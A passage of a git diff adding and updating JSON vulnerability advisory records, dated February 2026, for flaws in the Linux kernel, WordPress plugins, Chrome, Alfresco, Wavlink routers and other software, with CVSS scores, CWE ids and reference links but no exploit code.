], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w8gr-fpp3-xwvp/GHSA-w8gr-fpp3-xwvp.json b/advisories/unreviewed/2026/02/GHSA-w8gr-fpp3-xwvp/GHSA-w8gr-fpp3-xwvp.json index 22f9433f79bd7..e9bd3b063be8e 100644 --- a/advisories/unreviewed/2026/02/GHSA-w8gr-fpp3-xwvp/GHSA-w8gr-fpp3-xwvp.json +++ b/advisories/unreviewed/2026/02/GHSA-w8gr-fpp3-xwvp/GHSA-w8gr-fpp3-xwvp.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-122" + "CWE-122", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-w8hp-9h4v-r2fg/GHSA-w8hp-9h4v-r2fg.json b/advisories/unreviewed/2026/02/GHSA-w8hp-9h4v-r2fg/GHSA-w8hp-9h4v-r2fg.json new file mode 100644 index 0000000000000..2727785fe1b40 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w8hp-9h4v-r2fg/GHSA-w8hp-9h4v-r2fg.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w8hp-9h4v-r2fg", + "modified": "2026-02-20T06:30:38Z", + "published": "2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27322" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27322" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w8hr-79rx-368j/GHSA-w8hr-79rx-368j.json b/advisories/unreviewed/2026/02/GHSA-w8hr-79rx-368j/GHSA-w8hr-79rx-368j.json new file mode 100644 index 0000000000000..0d232faec0419 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w8hr-79rx-368j/GHSA-w8hr-79rx-368j.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w8hr-79rx-368j", + "modified": "2026-02-19T18:31:55Z", + "published": "2026-02-19T18:31:55Z", + "aliases": [ + "CVE-2026-26339" + ], + "details": "Hyland Alfresco Transformation Service allows unauthenticated attackers to achieve remote code execution through the argument injection vulnerability, which exists in the document processing functionality.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26339" + }, + { + "type": "WEB", + "url": "https://www.hyland.com/en/solutions/products/alfresco-platform" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/hyland-alfresco-transformation-service-argument-injection-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T18:25:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w8xp-8wjp-8rcf/GHSA-w8xp-8wjp-8rcf.json b/advisories/unreviewed/2026/02/GHSA-w8xp-8wjp-8rcf/GHSA-w8xp-8wjp-8rcf.json new file mode 100644 index 0000000000000..c446364d5898e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w8xp-8wjp-8rcf/GHSA-w8xp-8wjp-8rcf.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w8xp-8wjp-8rcf", + "modified": "2026-02-14T06:30:58Z", + "published": "2026-02-14T06:30:58Z", + "aliases": [ + "CVE-2026-26303" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26303" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T04:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json b/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json new file mode 100644 index 0000000000000..940a4d6d2b01d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w94g-pmcx-r454", + "modified": "2026-02-18T18:30:39Z", + "published": "2026-02-18T18:30:39Z", + "aliases": [ + "CVE-2025-71229" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtw88: Fix alignment fault in rtw_core_enable_beacon()\n\nrtw_core_enable_beacon() reads 4 bytes from an address that is not a\nmultiple of 4. This results in a crash on some systems.\n\nDo 1 byte reads/writes instead.\n\nUnable to handle kernel paging request at virtual address ffff8000827e0522\nMem abort info:\n ESR = 0x0000000096000021\n EC = 0x25: DABT (current EL), IL = 32 bits\n SET = 0, FnV = 0\n EA = 0, S1PTW = 0\n FSC = 0x21: alignment fault\nData abort info:\n ISV = 0, ISS = 0x00000021, ISS2 = 0x00000000\n CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\nswapper pgtable: 4k pages, 48-bit VAs, pgdp=0000000005492000\n[ffff8000827e0522] pgd=0000000000000000, p4d=10000001021d9403, pud=10000001021da403, pmd=100000011061c403, pte=00780000f3200f13\nInternal error: Oops: 0000000096000021 [#1] SMP\nModules linked in: [...] rtw88_8822ce rtw88_8822c rtw88_pci rtw88_core [...]\nCPU: 0 UID: 0 PID: 73 Comm: kworker/u32:2 Tainted: G W 6.17.9 #1-NixOS VOLUNTARY\nTainted: [W]=WARN\nHardware name: FriendlyElec NanoPC-T6 LTS (DT)\nWorkqueue: phy0 rtw_c2h_work [rtw88_core]\npstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\npc : rtw_pci_read32+0x18/0x40 [rtw88_pci]\nlr : rtw_core_enable_beacon+0xe0/0x148 [rtw88_core]\nsp : ffff800080cc3ca0\nx29: ffff800080cc3ca0 x28: ffff0001031fc240 x27: ffff000102100828\nx26: ffffd2cb7c9b4088 x25: ffff0001031fc2c0 x24: ffff000112fdef00\nx23: ffff000112fdef18 x22: ffff000111c29970 x21: 0000000000000001\nx20: 0000000000000001 x19: ffff000111c22040 x18: 0000000000000000\nx17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000\nx14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000\nx11: 0000000000000000 x10: 0000000000000000 x9 : ffffd2cb6507c090\nx8 : 0000000000000000 x7 : 0000000000000000 x6 : 0000000000000000\nx5 : 0000000000000000 x4 : 0000000000000000 x3 : 0000000000000000\nx2 : 0000000000007f10 x1 : 0000000000000522 x0 : ffff8000827e0522\nCall trace:\n rtw_pci_read32+0x18/0x40 [rtw88_pci] (P)\n rtw_hw_scan_chan_switch+0x124/0x1a8 [rtw88_core]\n rtw_fw_c2h_cmd_handle+0x254/0x290 [rtw88_core]\n rtw_c2h_work+0x50/0x98 [rtw88_core]\n process_one_work+0x178/0x3f8\n worker_thread+0x208/0x418\n kthread+0x120/0x220\n ret_from_fork+0x10/0x20\nCode: d28fe202 8b020000 f9524400 8b214000 (b9400000)\n---[ end trace 0000000000000000 ]---", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71229" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/13394550441557115bb74f6de9778c165755a7ab" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/653f8b6a091538b084715f259900f62c2ec1c6cf" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/71dee092903adb496fe1f357b267d94087b679e0" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7d31dde1bd8678115329e46dc8d7afb63c176b74" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w9fg-2h32-5478/GHSA-w9fg-2h32-5478.json b/advisories/unreviewed/2026/02/GHSA-w9fg-2h32-5478/GHSA-w9fg-2h32-5478.json new file mode 100644 index 0000000000000..187b30ffa115c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w9fg-2h32-5478/GHSA-w9fg-2h32-5478.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w9fg-2h32-5478", + "modified": "2026-02-20T00:31:53Z", + "published": "2026-02-20T00:31:53Z", + "aliases": [ + "CVE-2026-2435" + ], + "details": "Tanium addressed a SQL injection vulnerability in Asset.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2435" + }, + { + "type": "WEB", + "url": "https://security.tanium.com/TAN-2026-004" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T00:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w9rp-vxw4-rq3m/GHSA-w9rp-vxw4-rq3m.json b/advisories/unreviewed/2026/02/GHSA-w9rp-vxw4-rq3m/GHSA-w9rp-vxw4-rq3m.json new file mode 100644 index 0000000000000..d610a50853e48 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w9rp-vxw4-rq3m/GHSA-w9rp-vxw4-rq3m.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w9rp-vxw4-rq3m", + "modified": "2026-02-19T18:31:53Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-27066" + ], + "details": "Missing Authorization vulnerability in PI Web Solution Live sales notification for WooCommerce live-sales-notifications-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Live sales notification for WooCommerce: from n/a through <= 2.3.46.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27066" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/live-sales-notifications-for-woocommerce/vulnerability/wordpress-live-sales-notification-for-woocommerce-plugin-2-3-44-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wc6c-368q-8vvv/GHSA-wc6c-368q-8vvv.json b/advisories/unreviewed/2026/02/GHSA-wc6c-368q-8vvv/GHSA-wc6c-368q-8vvv.json new file mode 100644 index 0000000000000..b392e509fb529 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wc6c-368q-8vvv/GHSA-wc6c-368q-8vvv.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wc6c-368q-8vvv", + "modified": "2026-02-14T18:30:15Z", + "published": "2026-02-14T18:30:15Z", + "aliases": [ + "CVE-2025-71223" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb/server: fix refcount leak in smb2_open()\n\nWhen ksmbd_vfs_getattr() fails, the reference count of ksmbd_file\nmust be released.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71223" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2456fde2b137703328f1695f60c68fe488d17e36" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/39ca11ff158c98fb092176f06047628c54bcf7a1" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4665e52bde3b1f8f442895ce7d88fa62a43e48c4" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f416c556997aa56ec4384c6b6efd6a0e6ac70aa7" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T17:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wc8x-254r-w3mh/GHSA-wc8x-254r-w3mh.json b/advisories/unreviewed/2026/02/GHSA-wc8x-254r-w3mh/GHSA-wc8x-254r-w3mh.json new file mode 100644 index 0000000000000..af1798aa18715 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wc8x-254r-w3mh/GHSA-wc8x-254r-w3mh.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wc8x-254r-w3mh", + "modified": "2026-02-19T21:30:46Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-27052" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in villatheme Sales Countdown Timer for WooCommerce and WordPress sctv-sales-countdown-timer allows PHP Local File Inclusion.This issue affects Sales Countdown Timer for WooCommerce and WordPress: from n/a through <= 1.1.8.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27052" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/sctv-sales-countdown-timer/vulnerability/wordpress-sales-countdown-timer-for-woocommerce-and-wordpress-plugin-1-1-8-1-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wcfp-f743-hjm5/GHSA-wcfp-f743-hjm5.json b/advisories/unreviewed/2026/02/GHSA-wcfp-f743-hjm5/GHSA-wcfp-f743-hjm5.json new file mode 100644 index 0000000000000..9373d93acfaff --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wcfp-f743-hjm5/GHSA-wcfp-f743-hjm5.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wcfp-f743-hjm5", + "modified": "2026-02-11T21:30:39Z", + "published": "2026-02-11T21:30:39Z", + "aliases": [ + "CVE-2026-2315" + ], + "details": "Inappropriate implementation in WebGPU in Google Chrome prior to 145.0.7632.45 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2315" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_10.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/479242793" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T19:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wcg8-g6m5-jgh5/GHSA-wcg8-g6m5-jgh5.json b/advisories/unreviewed/2026/02/GHSA-wcg8-g6m5-jgh5/GHSA-wcg8-g6m5-jgh5.json new file mode 100644 index 0000000000000..16527d749f0e1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wcg8-g6m5-jgh5/GHSA-wcg8-g6m5-jgh5.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wcg8-g6m5-jgh5", + "modified": "2026-02-14T09:31:34Z", + "published": "2026-02-14T09:31:33Z", + "aliases": [ + "CVE-2026-1987" + ], + "details": "The Scheduler Widget plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 0.1.6. This is due to the `scheduler_widget_ajax_save_event()` function lacking proper authorization checks and ownership verification when updating events. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify any event in the scheduler via the `id` parameter granted they have knowledge of the event ID.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1987" + }, + { + "type": "WEB", + "url": "https://cwe.mitre.org/data/definitions/639.html" + }, + { + "type": "WEB", + "url": "https://cwe.mitre.org/data/definitions/862.html" + }, + { + "type": "WEB", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/04-Testing_for_Insecure_Direct_Object_References" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/scheduler-widget/tags/0.1.6/scheduler-widget.php#L158" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/scheduler-widget/trunk/scheduler-widget.php#L158" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fd5f370c-743f-41f1-80ab-7f0805cae38c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T07:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wcj5-w68q-pq29/GHSA-wcj5-w68q-pq29.json b/advisories/unreviewed/2026/02/GHSA-wcj5-w68q-pq29/GHSA-wcj5-w68q-pq29.json new file mode 100644 index 0000000000000..c294f088038d2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wcj5-w68q-pq29/GHSA-wcj5-w68q-pq29.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wcj5-w68q-pq29", + "modified": "2026-02-12T06:30:13Z", + "published": "2026-02-12T06:30:13Z", + "aliases": [ + "CVE-2026-26092" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26092" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T05:17:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wcq7-39gh-x6jv/GHSA-wcq7-39gh-x6jv.json b/advisories/unreviewed/2026/02/GHSA-wcq7-39gh-x6jv/GHSA-wcq7-39gh-x6jv.json new file mode 100644 index 0000000000000..3b487c3c24861 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wcq7-39gh-x6jv/GHSA-wcq7-39gh-x6jv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wcq7-39gh-x6jv", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2026-2337" + ], + "details": "A vulnerability in Plunet Plunet BusinessManager allows session hijacking, data theft, unauthorized actions on behalf of the user.This issue affects Plunet BusinessManager: 10.15.1.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:L/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2337" + }, + { + "type": "WEB", + "url": "https://cds.thalesgroup.com/en/tcs-cert/CVE-2026-2337" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wf47-fvx4-6g8w/GHSA-wf47-fvx4-6g8w.json b/advisories/unreviewed/2026/02/GHSA-wf47-fvx4-6g8w/GHSA-wf47-fvx4-6g8w.json new file mode 100644 index 0000000000000..af8cc1e1c423a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wf47-fvx4-6g8w/GHSA-wf47-fvx4-6g8w.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wf47-fvx4-6g8w", + "modified": "2026-02-19T21:30:45Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25368" + ], + "details": "Missing Authorization vulnerability in codepeople Calculated Fields Form calculated-fields-form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Calculated Fields Form: from n/a through <= 5.4.4.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25368" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/calculated-fields-form/vulnerability/wordpress-calculated-fields-form-plugin-5-4-4-1-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wfhf-6fj8-r5gx/GHSA-wfhf-6fj8-r5gx.json b/advisories/unreviewed/2026/02/GHSA-wfhf-6fj8-r5gx/GHSA-wfhf-6fj8-r5gx.json new file mode 100644 index 0000000000000..7b9bc1a8d8564 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wfhf-6fj8-r5gx/GHSA-wfhf-6fj8-r5gx.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wfhf-6fj8-r5gx", + "modified": "2026-02-19T18:31:53Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-26358" + ], + "details": "Dell Unisphere for PowerMax, version(s) 10.2, contain(s) a Missing Authorization vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26358" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000429268/dsa-2026-102-dell-unisphere-for-powermax-and-powermax-eem-security-update-for-multiple-vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wgvg-658f-w72v/GHSA-wgvg-658f-w72v.json b/advisories/unreviewed/2026/02/GHSA-wgvg-658f-w72v/GHSA-wgvg-658f-w72v.json new file mode 100644 index 0000000000000..f1d3cd2e12065 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wgvg-658f-w72v/GHSA-wgvg-658f-w72v.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wgvg-658f-w72v", + "modified": "2026-02-17T15:31:35Z", + "published": "2026-02-17T15:31:35Z", + "aliases": [ + "CVE-2026-2615" + ], + "details": "A flaw has been found in Wavlink WL-NU516U1 up to 20251208. The affected element is the function singlePortForwardDelete of the file /cgi-bin/firewall.cgi. Executing a manipulation of the argument del_flag can lead to command injection. The attack may be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2615" + }, + { + "type": "WEB", + "url": "https://github.com/Wlz1112/Wavlink-NU516U1-V251208-/blob/main/singlePortForwardDelete.md" + }, + { + "type": "WEB", + "url": "https://github.com/Wlz1112/Wavlink-NU516U1-V251208-/blob/main/singlePortForwardDelete.md#exp" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346265" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346265" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.751047" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T13:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wh7q-jq87-h3wq/GHSA-wh7q-jq87-h3wq.json b/advisories/unreviewed/2026/02/GHSA-wh7q-jq87-h3wq/GHSA-wh7q-jq87-h3wq.json new file mode 100644 index 0000000000000..4c86fc079fd7a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wh7q-jq87-h3wq/GHSA-wh7q-jq87-h3wq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wh7q-jq87-h3wq", + "modified": "2026-02-19T18:31:53Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-25441" + ], + "details": "Missing Authorization vulnerability in LeadConnector LeadConnector leadconnector allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LeadConnector: from n/a through <= 3.0.21.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25441" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/leadconnector/vulnerability/wordpress-leadconnector-plugin-3-0-21-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wh7w-625p-7j85/GHSA-wh7w-625p-7j85.json b/advisories/unreviewed/2026/02/GHSA-wh7w-625p-7j85/GHSA-wh7w-625p-7j85.json new file mode 100644 index 0000000000000..2cfdd410bd542 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wh7w-625p-7j85/GHSA-wh7w-625p-7j85.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wh7w-625p-7j85", + "modified": "2026-02-19T21:30:48Z", + "published": "2026-02-19T21:30:48Z", + "aliases": [ + "CVE-2026-27387" + ], + "details": "Missing Authorization vulnerability in designinvento DirectoryPress directorypress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects DirectoryPress: from n/a through <= 3.6.26.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27387" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/directorypress/vulnerability/wordpress-directorypress-plugin-3-6-26-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T21:18:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-whjx-jr95-pc2f/GHSA-whjx-jr95-pc2f.json 